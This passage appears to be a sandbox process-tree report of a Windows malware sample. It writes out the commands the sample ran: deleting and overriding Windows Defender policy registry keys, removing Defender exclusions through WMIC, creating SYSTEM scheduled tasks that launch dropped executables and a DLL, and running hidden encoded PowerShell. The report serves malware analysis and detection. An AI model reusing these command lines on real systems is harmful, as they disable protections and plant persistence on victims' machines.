                                                                                                                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:3260
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:3936
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:3504
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:1748
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 05:12:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\CIsfQiJ.exe\" 9Z /S" /V1 /F
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                        PID:816
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                        PID:3108
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 352
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:4036
                                                                                                                                                                                                                                                                                    • C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\CIsfQiJ.exe
                                                                                                                                                                                                                                                                                      C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\CIsfQiJ.exe 9Z /S
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                      PID:1524
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:1788
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                                                                                                            PID:904
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:2396
                                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                    PID:2628
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                                                                                                                PID:1960
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:3872
                                                                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:2308
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                    PID:2096
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                      PID:1756
                                                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                        PID:2532
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                                                                                                                                    PID:2580
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:3252
                                                                                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                            PID:1836
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                                                                                                                        PID:3852
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                          PID:2456
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                            PID:3780
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                PID:3112
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:2916
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                          PID:3460
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                                                                                                                            PID:2160
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:4016
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                  PID:2552
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                      PID:3540
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                PID:1548
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                  PID:3808
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                    PID:2708
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                        PID:2756
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\muzYPJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                PID:2244
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\ObdWNBB.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                PID:2168
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                schtasks /END /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:892
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                  PID:3424
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\XVilooQ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                  PID:3016
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\bNocyAU.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                  PID:3036
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\QVyVVoq.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                  PID:4076
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\hrbTdNA.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                  PID:3272
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "vDtxL1" /SC once /ST 07:28:23 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                  PID:3472
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                  schtasks /run /I /tn "vDtxL1"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:3120
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "vDtxL1"
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:3952
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:972
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1524 -s 748
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:636
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                                                                                                    taskeng.exe {DD7E17C9-3C8B-4243-8DE1-4B95C6823C8E} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:3652
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                        PID:3800
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:3996
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                          PID:2340
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:2420
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                            PID:1056
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:3244
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                              PID:2288
                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                              C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                              PID:2696
                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                              C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                              PID:1104
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              PID:1548
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                              PID:3444
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:2428
                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                PID:2784
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:3656
                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:1976
                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:3928
